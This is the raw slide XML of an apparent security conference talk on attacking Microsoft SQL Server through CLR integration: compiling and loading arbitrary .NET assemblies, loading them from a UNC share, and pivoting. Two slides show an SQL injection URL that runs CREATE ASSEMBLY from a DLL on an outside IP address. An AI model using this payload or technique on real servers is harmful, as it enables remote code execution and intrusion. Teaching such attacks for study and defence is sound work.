              <a:t> enabled),1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="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CLR Integration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>allow for very fine grained access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fortunately these can all be over-ridden if you have SA access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simply it allows us to load an arbitrary .net Assembly into SQL Server, and depending on how we handle it, possibly execute this binary within SQL Servers address space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How do you load a .net assembly?</a:t>
            </a:r>
          </a:p>
          <a:p>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Loading .net Assemblies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</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Create .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Call on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to compile the binary (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Import the binary into SQL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profit! (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="csc.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3962400"/>
            <a:ext cx="8915400" cy="2804654"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Right Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="3677920"/>
            <a:ext cx="304800" cy="2113280"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Brace 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="6172200"/>
            <a:ext cx="304800" cy="350837"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Brace 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="6505787"/>
            <a:ext cx="304800" cy="276013"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="4368224"/>
            <a:ext cx="641522" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8335801" y="5410200"/>
            <a:ext cx="655799" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7664278" y="6019800"/>
            <a:ext cx="641522" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1568278" y="6273224"/>
            <a:ext cx="641522" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3366FF"/>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Loading .net Assemblies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There has been talk of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ntsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>debug.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> being removed in default installs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fortunately, we now have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> shipping with every deployed SQL Server!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csc.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is perfectly predictable:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%windir%\system32\dllcache\csc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This is still pretty ghetto!</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Loading .net Assemblies (UNC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fortunately, like DLL’s this can be loaded from a UNC share too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Profit!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Of course all of this is do-able via an injection point)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://victim2k3.sp.com/login.asp? username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>boo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=boo'%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>ASSEMBLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>moo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\\196.31.150.117\temp_smb\moo.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'—</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="unc-clr.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2371289"/>
            <a:ext cx="6629400" cy="448111"/>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reader_7.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blip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reader_8.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="-5237" r="-5237"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4313872"/>
            <a:ext cx="5029200" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://victim2k3.sp.com/login.asp? username=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>boo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=boo'%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>ASSEMBLY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>moo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%20'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>\\196.31.150.117\temp_smb\moo.dll</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images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3307844"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="images.jpeg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="3365261"/>
            <a:ext cx="423862" cy="545722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="3159125"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Time to pivot™</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="1719262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This stuff is ancient history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sp_quickkill</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extreme </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SensePost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tcpr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Foundstone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fpipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Circa 2000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="victim-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="3124200"/>
            <a:ext cx="1168400" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="attacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="569913" y="3289300"/>
            <a:ext cx="1130300" cy="1003300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569913" y="4292600"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="4327525"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pivot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="4260334"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="4945062"/>
            <a:ext cx="22860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Start </a:t>
            </a:r>
